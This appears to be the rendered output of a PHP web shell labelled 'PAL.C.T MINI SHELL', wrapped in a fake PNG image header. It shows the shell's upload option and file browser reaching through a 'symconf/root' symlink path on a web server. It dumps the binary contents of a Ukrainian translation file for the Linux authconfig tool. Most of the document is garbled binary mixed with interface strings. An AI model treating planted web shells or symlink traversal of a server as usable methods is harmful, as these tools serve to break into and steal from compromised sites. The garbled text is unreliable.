php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/Rm19_symconf/root/usr/share/locale/uk/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/Rm19_symconf/root/usr/share/locale/uk/LC_MESSAGES/authconfig.mo

Q N!pr#x##(!
/4=NW^f	ofyI*
6A
Q_qw	6E_b((x:;+1=Sg~" dE@%2?EKTg
*8OT]o


!&3@MRUX	akszR
h2 C S  !h";>#"z#!#"###$	$'$4$=$U$g$o$$t$%
%(%6H%%%[%%%&-&>&O&f&w&L{&&&&''
3'>'O'(g'0'0'1'$(,(.D()s([(_(+Y)6))#))**.*A*V*t*5* **@**8+,c+ +++S+V1,:,1,6,.,-.[-*-%-(-*.C/.'s.-./.$.</5[/=/1/:07<0-t0+0>0?
1)M1+w11*1M1O<2920252X-3-3)3$3'4)+4BU4&4,4.4#54?5&t5%5>5 61!6(S6;|6D636)170[7)7X7(8*880c88-88G`9F99:D.:4s::::4:'$;L;n<@=B=@H=O=K=J%>\p>>>>>??$?3?D?q5@@@@@&A
;AFA1B)>BhB9BB
VCXaCC%CC3D:DWDuEVzE$EE(F"8F)[FF.FHFH	G>RGAGG.HHwyIIJJ*J0JIJJKKKK0L1L6L?L[LqL,vLLL!LL7M<;MxMMMMMMMMMM
NN"NM2NNO0ONO
kOyO>cP!Q QQTRaTqUxWSzWRWY!XZ{X@X$Y'<Y#dY-Y/Y"Y>	Z"HZkZ&j[0[O[v\2\\\]]+]
^(^$=^b^w^~^2_5_S_r_2w___P_<(`te`k`mFaaHawbAbbcERdnd#eK+ewee
eee&eeSfWkf(ffEgwg!?hvahhiz>jXjskkkfkIYl2lNl[%mm@
nSNngn[
ofo|pspVqrWqJq=rCSrvrs@sfs#FtejttWuuuSivnv,wawDDx2xPx]
ykyByN5zbzVzu>{8{K{^9|5|o|8>}w}#~f~I
EWYW3VBL#Ã(`uJ)=1(ZHG7V(X!?OQY-lHwz#u6%,3ZK/=5k[qhLIoJT.By_|s$Pr;St9cbgvx&mEdM{
\'U*>a<	^
~N4fin0pWe@])C1}F` DA2j"8R+: <Tab>/<Alt-Tab> between elements   |   <Space> selects   |  <F12> next screen*<URL><b>Authentication Configuration</b><b>Local Authentication Options</b><b>Other Authentication Options</b><b>Smart Card Authentication Options</b><b>User Account Configuration</b><dn><domain><lowest-highest><module><name><realm><server><servers><small><b>Tip:</b> Smart cards support logging into both local and centrally managed accounts.</small><small><b>Tip:</b> This is managed via /etc/security/access.conf.</small><workgroup>ADS Realm:Ad_min Servers:Admin Server:Advanced _OptionsAlertAll configuration files which were modified by the previous authentication configuration change will be restored from backup. Revert the changes?Allow offline _loginAut_hentication Method:AuthenticationAuthentication ConfigurationAuthentication module %s/pam_%s.so is missing. Authentication process might not work correctly.BackBad smart card removal action specified.Base DN:Cache InformationCancelCard Re_moval Action:Certificate _URL:Click this button if you did not download a CA certificate yet or you have not set the CA certificate up by other means.Control how the system verifies users who attempt to log inCreate _home directories on the first loginDo not configure _NTPDo_n't SaveDomain Administrator:Domain Controllers:Domain _administrator:Domain:Download CA CertificateEnable _fingerprint reader supportEnable _local access controlEnable _smart card supportError downloading CA certificateFingerprint authentication allows you to log in by scanning your finger with the fingerprint reader.Fingerprint readerHashing or crypto algorithm used for storing passwords of local usersHostname or ldap:// or ldaps:// URI pointing to the LDAP server.IPA R_ealm:IPA _Domain:IPA _Server:IPAv2IPAv2 SettingsIPAv2 domain join was not succesful. The ipa-client-install command failed.IPAv2 passwordIf the home directory of an user doesn't exist yet it will be created automatically on his first login.IgnoreJoin DomainJoin SettingsJoining Winbind DomainKDC:KerberosKerberos SettingsKerberos passwordLDAPLDAP Search _Base DN:LDAP SettingsLDAP _Server:LDAP authenticationLDAP passwordLocal accounts onlyLocal authorization is sufficientLockNISNIS SettingsNIS _Domain:NIS _Server:NIS passwordNextNoOkPasswordPassword:R_ealm:Realm:Require smart car_d for loginRestore the configuration files backed up before the previous configuration changeRevertSave SettingsSecurity Model:Server:Smart card authentication allows you to log in using a certificate and key associated with a smart card.Some of the configuration changes you've made should be saved to disk before continuing.  If you do not save them, then your attempt to join the domain may fail.  Save changes?Te_mplate Shell:Template Shell:The %s file was not found, but it is required for %s support to work properly.
Install the %s package, which provides this file.To connect to a LDAP server with TLS protocol enabled you need a CA certificate which signed your server's certificate. Copy the certificate in the PEM format to the '%s' directory.
Then press OK.To verify the LDAP server with TLS protocol enabled you need a CA certificate which signed the server's certificate. Please fill in the URL where the CA certificate in the PEM format can be downloaded from.Unable to initialize graphical environment. Most likely cause of failure
is that the tool was not run using a graphical environment. Please either
start your graphical user interface or set your DISPLAY variable.
Unknown password hashing algorithm specified, using sha256.Use DNS to _locate KDCs for realmsUse DNS to locate KDCs for realmsUse DNS to resolve hosts to realmsUse D_NS to resolve hosts to realmsUse Fingerprint readerUse IPAv2Use KerberosUse LDAPUse LDAP AuthenticationUse MD5 PasswordsUse NISUse Shadow PasswordsUse TLSUse Transport Layer Security extension for LDAP as defined by RFC-2830. It must not be ticked with ldaps server URI.Use WinbindUse Winbind AuthenticationUse _TLS to encrypt connectionsUse the "Join Domain" button to join the IPAv2 domain.User InformationWarningWhen enabled /etc/security/access.conf will be consulted for authorization of users access.WinbindWinbind ADS R_ealm:Winbind Domain Co_ntrollers:Winbind SettingsWinbind _Domain:Winbind authenticationWinbind passwordYesYou must provide ldaps:// server address or use TLS for LDAP authentication._Download CA Certificate..._Identity & Authentication_Join Domain..._KDCs:_Password Hashing Algorithm:_Password:_Security Model:_User Account Database:action to be taken on smart card removalauthenticate system accounts by local files onlyauthenticate system accounts by network servicesauthorize local users also through remote servicecachingcan only be run as rootcheck access.conf during account authorizationconfigures winbind to allow offline loginconfigures winbind to assume that users with no domain in their user names are domain usersconfigures winbind to assume that users with no domain in their user names are not domain usersconfigures winbind to prevent offline logincreate home directories for users on their first logindefault LDAP base DNdefault LDAP server hostname or URIdefault NIS domaindefault NIS serverdefault hesiod LHSdefault hesiod RHSdefault kerberos KDCdefault kerberos admin serverdefault kerberos realmdefault realm for samba and winbind when security=adsdefault smart card module to usedialog was cancelleddisable IPAv2 for user information and authentication by defaultdisable LDAP for authentication by defaultdisable LDAP for user information by defaultdisable MD5 passwords by defaultdisable NIS for user information by defaultdisable SSSD for authentication by default (still used for supported configurationsdisable SSSD for user information by default (still used for supported configurations)disable authentication with fingerprint readers by defaultdisable authentication with smart card by defaultdisable caching of user credentials in SSSD by defaultdisable caching of user information by defaultdisable hesiod for user information by defaultdisable kerberos authentication by defaultdisable shadowed passwords by defaultdisable use of DNS to find kerberos KDCsdisable use of DNS to find kerberos realmsdisable use of RFC-2307bis schema for LDAP user information lookupsdisable use of TLS with LDAP (RFC-2830)disable winbind for authentication by defaultdisable winbind for user information by defaultdisable wins for hostname resolutiondisplay Back instead of Cancel in the main dialog of the TUIdo not check access.conf during account authorizationdo not create home directories for users on their first logindo not display the deprecated text user interfacedo not prefer dns over wins or nis for hostname resolutiondo not require smart card for authentication by defaultdo not setup the NTP against the IPAv2 domaindo not start/stop portmap, ypbind, and nscddo not update the configuration files, only print new settingsenable IPAv2 for user information and authentication by defaultenable LDAP for authentication by defaultenable LDAP for user information by defaultenable MD5 passwords by defaultenable NIS for user information by defaultenable SSSD for authentication by default with manually managed configurationenable SSSD for user information by default with manually managed configurationenable authentication with fingerprint readers by defaultenable authentication with smart card by defaultenable caching of user credentials in SSSD by defaultenable caching of user information by default (automatically disabled when SSSD is used)enable hesiod for user information by defaultenable kerberos authentication by defaultenable shadowed passwords by defaultenable use of DNS to find kerberos KDCsenable use of DNS to find kerberos realmsenable use of RFC-2307bis schema for LDAP user information lookupsenable use of TLS with LDAP (RFC-2830)enable winbind for authentication by defaultenable winbind for user information by defaultenable wins for hostname resolutiongid range winbind will assign to domain or ads usershash/crypt algorithm for new passwordsjoin the IPAv2 domain as this accountjoin the winbind domain or ads realm now as this administratorload CA certificate from the URLlocal authorization is sufficient for local usersnames of servers to authenticate againstnever use SSSD implicitly even for supported configurationsopposite of --test, update configuration files with changed settingsprefer dns over wins or nis for hostname resolutionprobe network for defaults and print themrequire smart card for authentication by defaultrestore the backup of configuration filesrestore the backup of configuration files saved before the previous configuration changesave a backup of all configuration filessecurity mode to use for samba and winbindsetup the NTP against the IPAv2 domain (default)shadow passwordthe IPAv2 domain the system should be part ofthe character which will be used to separate the domain and user part of winbind-created user names if winbindusedefaultdomain is not enabledthe directory which winbind-created users will have as home directoriesthe group which winbind-created users will have as their primary groupthe realm for the IPAv2 domainthe server for the IPAv2 domainthe shell which winbind-created users will have as their login shelluid range winbind will assign to domain or ads usersunexpected argumentupdate all configuration filesusage: %s [options]use SSSD implicitly if it supports the configurationworkgroup authentication servers are inProject-Id-Version: authconfig
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2012-05-02 17:32+0200
PO-Revision-Date: 2010-09-15 17:56+0300
Last-Translator: Yuri Chornoivan <yurchor@ukr.net>
Language-Team: Ukrainian <uk@li.org>
Language: uk
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Generator: Lokalize 1.1
Plural-Forms: nplurals=1; plural=0;
 <Tab>/<Alt-Tab> між елементами   |   <Space> вибір   |  <F12> наступний екран*<URL><b>Налаштовування автентифікації</b><b>Налаштовування локальної автентифікації<b>Налаштовування іншої автентифікації</b><b>Параметри автентифікації смарт-карт</b><b>Налаштовування облікового запису користувача</b><dn><домен><нижній-верхній><модуль><name><область><сервер><сервери><small><b>Підказка:</b> Смарт-карти підтримують можливості журналювання у локальних та централізовано керованих облікових записах.</small><small><b>Підказка:</b> Керування здійснюється у /etc/security/access.conf.</small><робоча група>Області ADS:_Керівні сервери:Керуючий сервер:_Додаткові параметриУвагаБудуть відновлені всі файли конфігурації, які було змінено попередньою зміною параметрів. Відновити файли?_Дозволити автономний вхід_Метод автентифікації:АутентифікаціяНалаштовування автентифікаціїВідсутній модуль аутентифікації %s/pam_%s.so. процес аутентифікації не буде коректним.НазадВказано неправильну дію видалення смарт-картки.Базовий DN:Кешувати інформаціюСкасуватиДія при _витягуванні картки:_URL сертифікату:Натисніть цю кнопку, якщо ви досі не завантажили сертифікат CA або сертифікат ще не визначений.Визначає методи перевірки користувачів, які намагаються ввійтиСтворювати _домашні каталоги при першому вході_Не налаштовувати NTP_Не зберігатиАдміністратор домену:Контролери домену:_Адміністратор домену:Домен:Завантажити сертифікат CAУвімкнути підтримку _відбитків пальцівУвімкнути _локальне керування доступомУвімкнути підтримку с_март-картокПомилка завантаження сертифікату CAАвтентифікація за відбитками пальців дозволяє входити у систему при успішному скануванні відбитку пальця.Сканер відбитків пальцівАлгоритм хешування/шифрування використовується при збереженні паролів локальних користувачівНазва вузла чи URI у форматі ldap:// чи ldaps:// для вказування LDAP-сервера._Область IPA:_Домен IPA:С_ервер IPA:IPAv2Параметри IPAv2Не вдалося увійти до домену IPAv2. Програмою ipa-client-install повернуто повідомлення про помилку.Пароль до IPAv2Якщо домашній каталог користувача ще не існує, він буде автоматично створений при першому вході.ІгноруватиВхід у доменПараметри входуПідключення до Winbind доменуKDC:KerberosПараметри KerberosПароль KerberosLDAP_Базовий DN для пошуку LDAP:Параметри LDAP_Сервер LDAP:LDAP автентифікаціяПароль LDAPЛише локальні облікові записиДостатньо локальної авторизаціїБлокуватиNISПараметри NIS_Домен NIS:С_ервер NIS:Пароль NISДаліНіГараздПарольПароль:О_бласть:Область:Вимагати с_март-картку для входу у системуВідновлювати файли конфігурації, копії яких були збережені до набрання змінами силиВідновити:Збереження змінМодель безпеки:Сервер:Автентифікація смарт-картками дозволяє входити у систему з використанням сертифікату та ключа, що пов'язаний зі смарт-карткою.Перш ніж продовжити необхідно записати на диск деякі зроблені вами зміни у параметрах. Якщо ви їх не збережете, ваша спроба приєднатись до домену не вдасться. Зберегти зміни?_Оболонка шаблону:Оболонка шаблону:Не знайдено файл %s, але він потрібен для забезпечення правильної роботи %s.
Встановіть пакет %s, який містить цей файл.Щоб з'єднатись з сервером LDAP використовуючи TLS, треба мати сертифікат CA, яким підписаний сертифікат вашого сервера. Скопіюйте сертифікат у форматі PEM у каталог '%s'.
Потім натисніть Гаразд.Для підключення до сервера LDAP з використанням TLS треба наявність сертифікату CA, яким підписаний сертифікат вашого сервера. Вкажіть адресу (URL), за якою можна звантажити сертифікат CA у форматі PEM.Не вдалося ініціалізувати графічне середовище. Ймовірно, причиною
є те, що програму запущено поза графічним середовищем. Будь
ласка, або запустіть графічний інтерфейс, або встановіть відповідне
значення змінної DISPLAY.
Вказано невідомий алгоритм хешування пароля, використовуючи sha256.Використовувати DNS для _пошуку KDC для областейВикористовувати DNS для пошуку KDC для областейВикористовувати DNS для пошуку вузлів та областей_Використовувати DNS для пошуку вузлів та областейВикористовувати сканування звітівВикористовувати IPAv2Використовувати KerberosВикористовувати LDAPВикор. автентифікацію LDAPВикористовувати паролі MD5Використовувати NISВикористовувати приховані пароліВикористовувати TLSВикористовувати розширені можливості TLS (Transport Layer Security) для LDAP (згідно RFC-2830). Не видирайте цей параметр, якщо використовується URI LDAP-сервера.Використовувати WinbindВикор. автентифікацію WinbindВикористовувати _TLS для шифрування з'єднаньСкористайтеся кнопкою «Увійти в домен», щоб увійти до домену IPAv2.Інформація про користувачаПопередженняЯкщо параметр увімкнено, то файл /etc/security/access.conf буде використовуватись для перевірки автентичності при доступі користувачів.Winbind_Область ADS Winbind:_Контролери домену Winbind:Параметри Winbind_Домен Winbind:Аутентифікація WinbindПароль WinbindТакТреба вказати адресу ldaps:// або використовувати автентифікацію TLS для LDAP._Завантажити сертифікат CA..._Аутентифікація_Увійти в домен..._KDCАл_горитм хешування паролю:_Пароль:_Модель безпеки:_База даних облікових записів користувачів:дія при витягуванні смарт-карткиавторизувати локальних користувачів лише через локальні файлиавторизувати локальних користувачів через мережні службиавторизувати локальних користувачів через зовнішні службикешуванняможе виконуватись лише користувачем rootперевіряти access.conf при перевірці автентичності облікового записуналаштовує winbind на дозвіл offline входуналаштовує winbind таким чином, що користувачі, які не містять домен у своїй назві, вважаються членами доменуналаштовує winbind таким чином, що користувачі, які не містять домен у своїй назві не вважаються членами доменуналаштовує winbind на заборону offline входустворювати домашні каталоги користувачів при першому входібазова DN сервера LDAPназва вузла чи URI стандартного LDAP-серверадомен NISтиповий сервер NIShesiod LHSтиповий hesiod RHSkerberos KDCкеруючий сервер kerberosобласть kerberosтипова область (realm) для samba та winbind якщо security=adsмодуль смарт-карток що типово використовуєтьсядіалог було перерванотипово не використовувати IPAv2 для зберігання даних користувачів і розпізнаванняне використовувати автентифікацію LDAPне використовувати LDAP для отримання інформації про користувачіввимкнути паролі MD5не використовувати NIS для отримання інформації про користувачівтипово вимкнути розпізнавання SSSD (SSSD буде використано для конфігурацій, що підтримують SSSD)типово вимкнути надання даних користувачів SSSD (SSSD буде використано для конфігурацій, що підтримують SSSD)не використовувати автентифікацію за допомогою відбитків пальцівне використовувати автентифікацію смарт-картокне використовувати кешування інформації про користувачів у SSSDне використовувати кешування інформації про користувачівне використовувати hesiod для інформації про користувачівне використовувати автентифікацію kerberosувімкнути приховані паролівимкнути використання DNS для пошуку kerberos KDCвимкнути використання DNS для пошуку областей kerberosне використовувати схему RFC-2307bis для пошуку інформації про користувача на LDAPвимкнути використання TLS з LDAP (RFC-2830)не використовувати winbindauth для автентифікаціїне використовувати winbind для інформації про користувачівне використовувати wins для розв'язання назв вузліввідображати у головному вікні текстового інтерфейсу кнопку Назад замість кнопки Скасуватине перевіряти access.conf при перевірці автентичності облікового записуне створювати домашні каталоги користувачів при першому входіне відображати застарілий текстовий інтерфейсне надавати перевагу dns, замість wins для розв'язання назв вузлівне вимагати автентифікацію смарт-картокне налаштовувати NTP для домену IPAv2не запускати/зупиняти portmap, ypbind, та nscdне оновлювати конфігураційні файли, лише вивести нові параметритипово використовувати IPAv2 для зберігання даних користувачів і розпізнаваннявикористовувати автентифікацію LDAPувімкнути LDAP для отримання інформації про користувачівувімкнути паролі MD5увімкнути NIS для отримання інформації про користувачівтипово увімкнути розпізнавання з SSSD з конфігурацією, що керується вручнутипово увімкнути надання даних користувачів SSSD з конфігурацією, що керується вручнувикористовувати автентифікацію за допомогою відбитків пальціввикористовувати автентифікацію смарт-картоквикористовувати кешування інформації про користувачів у SSSDвикористовувати кешування інформації про користувачів (автоматично вимкнено при використанні SSSD)використовувати hesiod для інформації про користувачіввикористовувати автентифікацію kerberosувімкнути приховані пароліувімкнути використання DNS для пошуку kerberos KDCувімкнути використання DNS для пошуку областей kerberosвикористовувати схему RFC-2307bis для пошуку інформації про користувача на LDAPувімкнути використання TLS з LDAP (RFC-2830)використовувати winbindauth для автентифікаціївикористовувати winbind для інформації про користувачіввикористовувати wins для розв'язання назв вузлівдіапазон gid, який winbind буде призначати домену або ads користувачамхеш/алгоритм для нового паролядолучити домен IPAv2 як цей обліковий записвходити у winbind домен або ads область як адміністраторзавантажити сертифікат CA з URLлокальної авторизації достатньо для локальних користувачівімена серверів автентифікаціїніколи не використовувати SSSD неявно, навіть для конфігурацій, у яких передбачено підтримку SSDпротилежність --test, оновлює змінені параметри у конфігураційних файлахнадавати перевагу dns, а не wins для розв'язання назв вузліввизначити параметри мережі автоматичновимагати автентифікацію смарт-картоквідновити резервні копії всіх файлів параметріввідновлювати резервні копії файлів конфігурації, які були збережені перед останньою зміною параметрівзберегти резервні копії всіх файлів параметріврежим безпеки для samba та winbindналаштувати NTP для домену IPAv2 (типова поведінка)приховані паролідомен IPAv2, частиною якого має бути системасимвол, який буде використовуватись для відокремлення частин домену та користувача у створюваних winbind іменах користувачів, якщо winbindusedefaultdomain не ввімкненокаталог, який створені winbind користувачі будуть використовувати для домашніх каталогівгрупа, яку створені winbind користувачі будуть використовувати у якості первинної групиобласть дії домену IPAv2сервер домену IPAv2оболонка, яку створені winbind користувачі будуть використовувати у якості оболонки входудіапазон uid, який winbind буде призначати домену або ads користувачамнесподіваний аргументоновити всі конфігураційні файливикористання: %s [параметри]використовувати SSSD неявно, якщо така можливість підтримується конфігурацієюсервери автентифікації робочої групи у
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`